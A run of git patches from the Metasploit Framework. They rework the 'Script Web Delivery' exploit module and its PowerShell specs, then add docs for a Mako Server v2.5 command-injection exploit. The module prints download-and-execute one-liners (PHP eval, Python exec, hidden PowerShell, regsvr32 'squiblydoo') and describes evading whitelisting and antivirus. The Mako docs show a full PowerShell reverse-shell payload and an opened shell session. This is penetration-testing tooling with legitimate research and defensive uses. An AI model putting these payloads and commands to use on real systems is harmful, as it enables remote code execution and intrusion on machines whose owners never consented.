Msf::Exploit::EXE include Msf::Exploit::Powershell include Msf::Exploit::Remote::HttpServer @@ -16,34 +15,22 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Script Web Delivery', 'Description' => %q( - This module quickly fires up a web server that serves a payload. - The provided command which will allow for a payload to download and execute. - It will do it either specified scripting language interpreter or "squiblydoo" via regsvr32.exe - for bypassing application whitelisting. The main purpose of this module is to quickly establish - a session on a target machine when the attacker has to manually type in the command: - e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Execution. - This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege - escalations supplied by Meterpreter. - - When using either of the PSH targets, ensure the payload architecture matches the target computer - or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines. - - Regsvr32 uses "squiblydoo" technique for bypassing application whitelisting. - The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included - PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute) - can occur on the same port. - - "PSH (Binary)" will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed. + This module quickly fires up a web server that serves a payload. + The provided command will start the specified scripting language interpreter and then download and execute the + payload. The main purpose of this module is to quickly establish a session on a target + machine when the attacker has to manually type in the command himself, e.g. Command Injection, + RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not + write to disk so it is less likely to trigger AV solutions and will allow privilege + escalations supplied by Meterpreter. When using either of the PSH targets, ensure the + payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute + x86 payloads on x64 machines. ), 'License' => MSF_LICENSE, 'Author' => [ 'Andrew Smith "jakx" ', 'Ben Campbell', - 'Chris Campbell', # @obscuresec - Inspiration n.b. no relation! - 'Casey Smith', # AppLocker bypass research and vulnerability discovery (@subTee) - 'Trenton Ivey', # AppLocker MSF Module (kn0) - 'g0tmi1k', # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features + 'Chris Campbell' # @obscuresec - Inspiration n.b. no relation! ], 'DefaultOptions' => { @@ -51,11 +38,10 @@ class MetasploitModule < Msf::Exploit::Remote }, 'References' => [ - ['URL', 'https://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'], - ['URL', 'https://www.pentestgeek.com/2013/07/19/invoke-shellcode/'], + ['URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'], + ['URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/'], ['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'], - ['URL', 'https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'], - ['URL', 'https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html'], + ['URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'] ], 'Platform' => %w(python php win), 'Targets' => @@ -71,117 +57,45 @@ class MetasploitModule < Msf::Exploit::Remote ['PSH', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64] - }], - ['Regsvr32', { - 'Platform' => 'win', - 'Arch' => [ARCH_X86, ARCH_X64] - }], - ['PSH (Binary)', { - 'Platform' => 'win', - 'Arch' => [ARCH_X86, ARCH_X64] }] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 19 2013' )) - - register_advanced_options( - [ - OptBool.new('PSH-Proxy', [ true, 'PSH - Use the system proxy', true ]), - OptString.new('PSHBinary-PATH', [ false, 'PSH (Binary) - The folder to store the file on the target machine (Will be %TEMP% if left blank)', '' ]), - OptString.new('PSHBinary-FILENAME', [ false, 'PSH (Binary) - The filename to use (Will be random if left blank)', '' ]), - ], self.class - ) end - - def primer - php = %Q(php -d allow_url_fopen=true -r "eval(file_get_contents('#{get_uri}'));") - python = %Q(python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{get_uri}');exec(r.read());") - regsvr = %Q(regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll) - - print_status("Run the following command on the target machine:") - case target.name - when 'PHP' - print_line("#{php}") - when 'Python' - print_line("#{python}") - when 'PSH' - psh = gen_psh("#{get_uri}", "string") - print_line("#{psh}") - when 'Regsvr32' - print_line("#{regsvr}") - when 'PSH (Binary)' - psh = gen_psh("#{get_uri}", "download") - print_line("#{psh}") - end - end - - def on_request_uri(cli, _request) - if _request.raw_uri =~ /\.sct$/ - psh = gen_psh("#{get_uri}", "string") - data = gen_sct_file(psh) - elsif target.name.include? 'PSH (Binary)' - data = generate_payload_exe - elsif target.name.include? 'PSH' or target.name.include? 'Regsvr32' + print_status('Delivering Payload') + if target.name.include? 'PSH' data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true ) else - data = %Q(#{payload.encoded}) - end - - if _request.raw_uri =~ /\.sct$/ - print_status("Handling .sct Request") - send_response(cli, data, 'Content-Type' => 'text/plain') - else - print_status("Delivering Payload") - send_response(cli, data, 'Content-Type' => 'application/octet-stream') + data = %Q(#{payload.encoded} ) end + send_response(cli, data, 'Content-Type' => 'application/octet-stream') end - - def gen_psh(url, *method) + def primer + url = get_uri + print_status('Run the following command on the target machine:') + case target.name + when 'PHP' + print_line("php -d allow_url_fopen=true -r \"eval(file_get_contents('#{url}'));\"") + when 'Python' + print_line('Python:') + print_line("python -c \"import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{url}');exec(r.read());\"") + when 'PSH' ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl - - if method.include? 'string' - download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url)) - else - # Random filename to use, if there isn't anything set - random = "#{rand_text_alphanumeric 8}.exe" - - # Set filename (Use random filename if empty) - filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME'] - - # Set path (Use %TEMP% if empty) - path = datastore['BinaryEXE-PATH'].blank? ? "$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}') - - # Join Path and Filename - file = %Q(echo (#{path}+'\\#{filename}')) - - # Generate download PowerShell command - download_string = Rex::Powershell::PshMethods.download_run(url, file}) - end - + download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url) download_and_run = "#{ignore_cert}#{download_string}" - - # Generate main PowerShell command - return generate_psh_command_line(noprofile: true, - windowstyle: 'hidden', - command: download_and_run - ) - end - - - def rand_class_id - "#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}" - end - - - def gen_sct_file(command) - %{} + print_line generate_psh_command_line( + noprofile: true, + windowstyle: 'hidden', + command: download_and_run + ) + end end end diff --git a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb index 1143b831a5..bb12511682 100644 --- a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb +++ b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb @@ -8,9 +8,6 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Powershell include Msf::Exploit::Remote::HttpServer - include Msf::Module::Deprecated - - deprecated(Date.new(2018, 3, 5), 'exploits/multi/script/web_delivery.rb') def initialize(info = {}) super(update_info(info, From f2cba8d920485059a1cdfb1a00dd6b8b68e1226e Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Wed, 25 Oct 2017 16:29:11 -0500 Subject: [PATCH 052/254] Land #8933, Web_Delivery - Merge regsvr32_applocker_bypass_server & Add PSH(Binary) This restores the original PR --- metasploit-framework.gemspec | 2 +- modules/exploits/multi/script/web_delivery.rb | 154 ++++++++++++++---- .../misc/regsvr32_applocker_bypass_server.rb | 3 + 3 files changed, 124 insertions(+), 35 deletions(-) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 6accc821ad..7bf217c2c3 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -139,7 +139,7 @@ Gem::Specification.new do |spec| # Library for Generating Randomized strings valid as Identifiers such as variable names spec.add_runtime_dependency 'rex-random_identifier' # library for creating Powershell scripts for exploitation purposes - spec.add_runtime_dependency 'rex-powershell', ["< 0.1.73"] + spec.add_runtime_dependency 'rex-powershell', ["< 0.1.78"] # Library for processing and creating Zip compatbile archives spec.add_runtime_dependency 'rex-zip' # Library for parsing offline Windows Registry files diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index 9adc1dacb4..707f1ca524 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -8,6 +8,7 @@ require 'msf/core/exploit/powershell' class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking + include Msf::Exploit::EXE include Msf::Exploit::Powershell include Msf::Exploit::Remote::HttpServer @@ -15,22 +16,34 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Script Web Delivery', 'Description' => %q( - This module quickly fires up a web server that serves a payload. - The provided command will start the specified scripting language interpreter and then download and execute the - payload. The main purpose of this module is to quickly establish a session on a target - machine when the attacker has to manually type in the command himself, e.g. Command Injection, - RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not - write to disk so it is less likely to trigger AV solutions and will allow privilege - escalations supplied by Meterpreter. When using either of the PSH targets, ensure the - payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute - x86 payloads on x64 machines. + This module quickly fires up a web server that serves a payload. + The provided command which will allow for a payload to download and execute. + It will do it either specified scripting language interpreter or "squiblydoo" via regsvr32.exe + for bypassing application whitelisting. The main purpose of this module is to quickly establish + a session on a target machine when the attacker has to manually type in the command: + e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Execution. + This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege + escalations supplied by Meterpreter. + + When using either of the PSH targets, ensure the payload architecture matches the target computer + or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines. + + Regsvr32 uses "squiblydoo" technique for bypassing application whitelisting. + The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included + PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute) + can occur on the same port. + + "PSH (Binary)" will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed. ), 'License' => MSF_LICENSE, 'Author' => [ 'Andrew Smith "jakx" ', 'Ben Campbell', - 'Chris Campbell' # @obscuresec - Inspiration n.b. no relation! + 'Chris Campbell', # @obscuresec - Inspiration n.b. no relation! + 'Casey Smith', # AppLocker bypass research and vulnerability discovery (@subTee) + 'Trenton Ivey', # AppLocker MSF Module (kn0) + 'g0tmi1k', # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features ], 'DefaultOptions' => { @@ -38,10 +51,11 @@ class MetasploitModule < Msf::Exploit::Remote }, 'References' => [ - ['URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'], - ['URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/'], + ['URL', 'https://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'], + ['URL', 'https://www.pentestgeek.com/2013/07/19/invoke-shellcode/'], ['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'], - ['URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'] + ['URL', 'https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'], + ['URL', 'https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html'], ], 'Platform' => %w(python php win), 'Targets' => @@ -57,45 +71,117 @@ class MetasploitModule < Msf::Exploit::Remote ['PSH', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64] + }], + ['Regsvr32', { + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64] + }], + ['PSH (Binary)', { + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64] }] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 19 2013' )) + + register_advanced_options( + [ + OptBool.new('PSH-Proxy', [ true, 'PSH - Use the system proxy', true ]), + OptString.new('PSHBinary-PATH', [ false, 'PSH (Binary) - The folder to store the file on the target machine (Will be %TEMP% if left blank)', '' ]), + OptString.new('PSHBinary-FILENAME', [ false, 'PSH (Binary) - The filename to use (Will be random if left blank)', '' ]), + ], self.class + ) end + + def primer + php = %Q(php -d allow_url_fopen=true -r "eval(file_get_contents('#{get_uri}'));") + python = %Q(python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{get_uri}');exec(r.read());") + regsvr = %Q(regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll) + + print_status("Run the following command on the target machine:") + case target.name + when 'PHP' + print_line("#{php}") + when 'Python' + print_line("#{python}") + when 'PSH' + psh = gen_psh("#{get_uri}", "string") + print_line("#{psh}") + when 'Regsvr32' + print_line("#{regsvr}") + when 'PSH (Binary)' + psh = gen_psh("#{get_uri}", "download") + print_line("#{psh}") + end + end + + def on_request_uri(cli, _request) - print_status('Delivering Payload') - if target.name.include? 'PSH' + if _request.raw_uri =~ /\.sct$/ + psh = gen_psh("#{get_uri}", "string") + data = gen_sct_file(psh) + elsif target.name.include? 'PSH (Binary)' + data = generate_payload_exe + elsif target.name.include? 'PSH' or target.name.include? 'Regsvr32' data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true ) else - data = %Q(#{payload.encoded} ) + data = %Q(#{payload.encoded}) + end + + if _request.raw_uri =~ /\.sct$/ + print_status("Handling .sct Request") + send_response(cli, data, 'Content-Type' => 'text/plain') + else + print_status("Delivering Payload") + send_response(cli, data, 'Content-Type' => 'application/octet-stream') end - send_response(cli, data, 'Content-Type' => 'application/octet-stream') end - def primer - url = get_uri - print_status('Run the following command on the target machine:') - case target.name - when 'PHP' - print_line("php -d allow_url_fopen=true -r \"eval(file_get_contents('#{url}'));\"") - when 'Python' - print_line('Python:') - print_line("python -c \"import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{url}');exec(r.read());\"") - when 'PSH' + + def gen_psh(url, *method) ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl - download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url) + + if method.include? 'string' + download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url)) + else + # Random filename to use, if there isn't anything set + random = "#{rand_text_alphanumeric 8}.exe" + + # Set filename (Use random filename if empty) + filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME'] + + # Set path (Use %TEMP% if empty) + path = datastore['BinaryEXE-PATH'].blank? ? "$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}') + + # Join Path and Filename + file = %Q(echo (#{path}+'\\#{filename}')) + + # Generate download PowerShell command + download_string = Rex::Powershell::PshMethods.download_run(url, file}) + end + download_and_run = "#{ignore_cert}#{download_string}" - print_line generate_psh_command_line( - noprofile: true, - windowstyle: 'hidden', - command: download_and_run - ) - end + + # Generate main PowerShell command + return generate_psh_command_line(noprofile: true, + windowstyle: 'hidden', + command: download_and_run + ) + end + + + def rand_class_id + "#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}" + end + + + def gen_sct_file(command) + %{} end end diff --git a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb index bb12511682..1143b831a5 100644 --- a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb +++ b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb @@ -8,6 +8,9 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Powershell include Msf::Exploit::Remote::HttpServer + include Msf::Module::Deprecated + + deprecated(Date.new(2018, 3, 5), 'exploits/multi/script/web_delivery.rb') def initialize(info = {}) super(update_info(info, From 43b67fe80bc79ffafa70e4784407054fbc4f3ed0 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Thu, 26 Oct 2017 15:01:53 -0500 Subject: [PATCH 053/254] remove errant bracket, formatting update --- Gemfile.lock | 4 ++-- modules/exploits/multi/script/web_delivery.rb | 7 ++----- 2 files changed, 4 insertions(+), 7 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 572a93e651..69ab329926 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -49,7 +49,7 @@ PATH rex-mime rex-nop rex-ole - rex-powershell (< 0.1.73) + rex-powershell (< 0.1.78) rex-random_identifier rex-registry rex-rop_builder @@ -278,7 +278,7 @@ GEM rex-arch rex-ole (0.1.6) rex-text - rex-powershell (0.1.72) + rex-powershell (0.1.77) rex-random_identifier rex-text rex-random_identifier (0.1.4) diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index 707f1ca524..c73bbff5f7 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -163,16 +163,13 @@ class MetasploitModule < Msf::Exploit::Remote file = %Q(echo (#{path}+'\\#{filename}')) # Generate download PowerShell command - download_string = Rex::Powershell::PshMethods.download_run(url, file}) + download_string = Rex::Powershell::PshMethods.download_run(url, file) end download_and_run = "#{ignore_cert}#{download_string}" # Generate main PowerShell command - return generate_psh_command_line(noprofile: true, - windowstyle: 'hidden', - command: download_and_run - ) + return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run) end From cd755b05d5e7f904063793f0293e9248af4429a0 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Thu, 26 Oct 2017 15:03:10 -0500 Subject: [PATCH 054/254] update powershell specs for rex-powershell 0.1.77 --- .../cmd/windows/powershell_bind_tcp.rb | 2 +- .../cmd/windows/powershell_reverse_tcp.rb | 2 +- .../singles/windows/powershell_bind_tcp.rb | 2 +- .../singles/windows/powershell_reverse_tcp.rb | 2 +- .../windows/x64/powershell_bind_tcp.rb | 2 +- .../windows/x64/powershell_reverse_tcp.rb | 2 +- spec/lib/msf/core/exploit/powershell_spec.rb | 35 +++++++++---------- 7 files changed, 22 insertions(+), 25 deletions(-) diff --git a/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb b/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb index b677a24fef..83e3bc0f93 100644 --- a/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb +++ b/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb @@ -10,7 +10,7 @@ require 'msf/core/handler/bind_tcp' module MetasploitModule - CachedSize = 1501 + CachedSize = 1518 include Msf::Payload::Single include Rex::Powershell::Command diff --git a/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb b/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb index 2eb30f8fdd..48bcf2a81d 100644 --- a/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb +++ b/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/core/handler/reverse_tcp_ssl' module MetasploitModule - CachedSize = 1509 + CachedSize = 1526 include Msf::Payload::Single include Rex::Powershell::Command diff --git a/modules/payloads/singles/windows/powershell_bind_tcp.rb b/modules/payloads/singles/windows/powershell_bind_tcp.rb index 9b7413ffef..caf3a2f68d 100644 --- a/modules/payloads/singles/windows/powershell_bind_tcp.rb +++ b/modules/payloads/singles/windows/powershell_bind_tcp.rb @@ -15,7 +15,7 @@ require 'msf/core/handler/bind_tcp' ### module MetasploitModule - CachedSize = 1501 + CachedSize = 1518 include Msf::Payload::Windows::Exec include Rex::Powershell::Command diff --git a/modules/payloads/singles/windows/powershell_reverse_tcp.rb b/modules/payloads/singles/windows/powershell_reverse_tcp.rb index f7a5dcab0c..beba1f83bc 100644 --- a/modules/payloads/singles/windows/powershell_reverse_tcp.rb +++ b/modules/payloads/singles/windows/powershell_reverse_tcp.rb @@ -15,7 +15,7 @@ require 'msf/core/handler/reverse_tcp_ssl' ### module MetasploitModule - CachedSize = 1509 + CachedSize = 1526 include Msf::Payload::Windows::Exec include Msf::Payload::Windows::Powershell diff --git a/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb b/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb index 477f7c0961..face477a1b 100644 --- a/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb +++ b/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb @@ -15,7 +15,7 @@ require 'msf/core/handler/bind_tcp' ### module MetasploitModule - CachedSize = 1501 + CachedSize = 1518 include Msf::Payload::Windows::Exec_x64 include Rex::Powershell::Command diff --git a/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb b/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb index e3bdaee025..5713b440c1 100644 --- a/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb @@ -15,7 +15,7 @@ require 'msf/core/handler/reverse_tcp_ssl' ### module MetasploitModule - CachedSize = 1509 + CachedSize = 1526 include Msf::Payload::Windows::Exec_x64 include Msf::Payload::Windows::Powershell diff --git a/spec/lib/msf/core/exploit/powershell_spec.rb b/spec/lib/msf/core/exploit/powershell_spec.rb index fbe38decdf..ef6b4ca487 100644 --- a/spec/lib/msf/core/exploit/powershell_spec.rb +++ b/spec/lib/msf/core/exploit/powershell_spec.rb @@ -313,14 +313,9 @@ RSpec.describe Msf::Exploit::Powershell do subject.datastore['Powershell::method'] = 'msil' subject.options.validate(subject.datastore) end - it 'should raise an exception' do - except = false - begin - subject.cmd_psh_payload(payload, arch) - rescue RuntimeError - except = true - end - expect(except).to be_truthy + it 'should generate a command line' do + code = subject.cmd_psh_payload(payload, arch) + expect(decompress(code).include?('System.Reflection.MethodInfo')).to be_truthy end end @@ -396,10 +391,10 @@ RSpec.describe Msf::Exploit::Powershell do end end - context 'when use single quotes' do - it 'should wrap in single quotes' do - code = subject.cmd_psh_payload(payload, arch, {:use_single_quotes => true}) - expect(code.include?(' -c \'')).to be_truthy + context 'when wrap double quotes' do + it 'should wrap in double quotes' do + code = subject.cmd_psh_payload(payload, arch, {:wrap_double_quotes => true}) + expect(code.include?(' -c "')).to be_truthy end end end @@ -449,7 +444,8 @@ RSpec.describe Msf::Exploit::Powershell do [:sta, true], [:noprofile, true], [:windowstyle, "hidden"], - [:command, "Z"] + [:command, "Z"], + [:wrap_double_quotes, true] ] permutations = (0..command_args.length).to_a.combination(2).map{|i,j| command_args[i...j]} @@ -464,20 +460,21 @@ RSpec.describe Msf::Exploit::Powershell do opts[:shorten] = false long_args = subject.generate_psh_args(opts) - opt_length = opts.length - 1 - expect(short_args).not_to be_nil expect(long_args).not_to be_nil - expect(short_args.count('-')).to eql opt_length - expect(long_args.count('-')).to eql opt_length expect(short_args[0]).not_to eql " " expect(long_args[0]).not_to eql " " expect(short_args[-1]).not_to eql " " expect(long_args[-1]).not_to eql " " if opts[:command] - expect(long_args[-10..-1]).to eql "-Command Z" - expect(short_args[-4..-1]).to eql "-c Z" + if opts[:wrap_double_quotes] + expect(long_args[-12..-1]).to eql "-Command \"Z\"" + expect(short_args[-6..-1]).to eql "-c \"Z\"" + else + expect(long_args[-10..-1]).to eql "-Command Z" + expect(short_args[-4..-1]).to eql "-c Z" + end end end end From 8613852ee8ef31f34229437ed108d20dadd0f267 Mon Sep 17 00:00:00 2001 From: Steven Patterson Date: Thu, 26 Oct 2017 23:29:11 -0400 Subject: [PATCH 055/254] Add Mako Server v2.5 command injection module/docs --- .../windows/http/makoserver_cmd_exec.md | 163 ++++++++++++++++++ .../windows/http/makoserver_cmd_exec.rb | 125 ++++++++++++++ 2 files changed, 288 insertions(+) create mode 100644 documentation/modules/exploit/windows/http/makoserver_cmd_exec.md create mode 100644 modules/exploits/windows/http/makoserver_cmd_exec.rb diff --git a/documentation/modules/exploit/windows/http/makoserver_cmd_exec.md b/documentation/modules/exploit/windows/http/makoserver_cmd_exec.md new file mode 100644 index 0000000000..207fc99c1e --- /dev/null +++ b/documentation/modules/exploit/windows/http/makoserver_cmd_exec.md @@ -0,0 +1,163 @@ +## Description + + This module exploits a vulnerability found in Mako Server v2.5. + It's possible to inject arbitrary OS commands in the Mako Server tutorial page through a PUT request to save.lsp. Attacker input will be saved on the victims machine and can be executed by sending a GET request to manage.lsp. + + Based on the public PoC found here: https://blogs.securiteam.com/index.php/archives/3391 + +## Vulnerable Application + + [Mako Server](https://makoserver.net) is an application framework for designing web and IoT applications. + + This module has been verified against the following Mako Server versions for Windows XP SP3 and Windows 7 SP1 (x86/x64): + - v2.5 + + Links: + - [Windows installer](https://makoserver.net/download/mako.windows.x86.exe) + - [Windows download page](https://makoserver.net/download/windows) + - [Documentation](https://makoserver.net/documentation/manual/) + +## References for vulnerability + - https://blogs.securiteam.com/index.php/archives/3391 + - https://www.exploit-db.com/exploits/42683 + +## Verification Steps + + 1. Run the installer "mako.windows.x86" on a Windows 7 SP1 (x86/x64) target (with Powershell for this example to work) + 2. After installer finishes, double click the "Mako-Demo" shortcut on the desktop + 3. Start msfconsole on host + 4. Do: ```use exploit/windows/http/makoserver_cmd_exec``` + 5. Do: ```set RHOST ``` + 6. Do: ```set PAYLOAD cmd/windows/reverse_powershell``` + 7. Do: ```set LHOST ``` + 8. Do: ```exploit``` + 9. You should get a Windows command shell + +## Example Output +``` +msf > use exploit/windows/http/makoserver_cmd_exec +msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3 +RHOST => 10.10.10.3 +msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell +PAYLOAD => cmd/windows/reverse_powershell +msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.2 +LHOST => 10.10.10.2 +msf exploit(makoserver_cmd_exec) > exploit + +[*] Started reverse TCP handler on 10.10.10.2:4444 +[*] Sending payload to target... +[*] Command shell session 1 opened (10.10.10.2:4444 -> 10.10.10.3:49175) at 2017-10-26 21:23:59 -0400 + +Microsoft Windows +Copyright (c) 2009 Microsoft Corporation. All rights reserved. + +C:\Users\Smith\Downloads\MakoServer> + +``` + +## Example Verbose Output +``` +msf > use exploit/windows/http/makoserver_cmd_exec +msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3 +RHOST => 10.10.10.3 +msf exploit(makoserver_cmd_exec) > set VERBOSE true +VERBOSE => true +msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell +PAYLOAD => cmd/windows/reverse_powershell +msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.2 +LHOST => 10.10.10.2 +msf exploit(makoserver_cmd_exec) > check + +[*] Trying to detect running Mako Server and necessary files... +[*] Mako Server save.lsp returns correct ouput. +[*] 10.10.10.3:80 The target appears to be vulnerable. +msf exploit(makoserver_cmd_exec) > exploit + +[*] Started reverse TCP handler on 10.10.10.2:4444 +[*] Sending payload to target... +[*] Now executing the following command: os.execute([[powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) {$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='10.10.10.2';$p='4444';$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if ($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};]]) +[*] Sending PUT request to save.lsp... +[*] Sending GET request to manage.lsp... +[*] Command shell session 1 opened (10.10.10.2:4444 -> 10.10.10.3:49174) at 2017-10-26 21:21:08 -0400 + +Microsoft Windows +Copyright (c) 2009 Microsoft Corporation. All rights reserved. + +C:\Users\Smith\Downloads\MakoServer> + +``` + +## Scenarios + +### Targeting Windows 7 SP1 x64 running Mako Server v2.5 + + A typical scenario would be to obtain a Windows command shell and then upgrade to a Meterpreter session: + + ``` + msf > use exploit/windows/http/makoserver_cmd_exec + msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2 + RHOST => 10.10.10.2 + msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell + 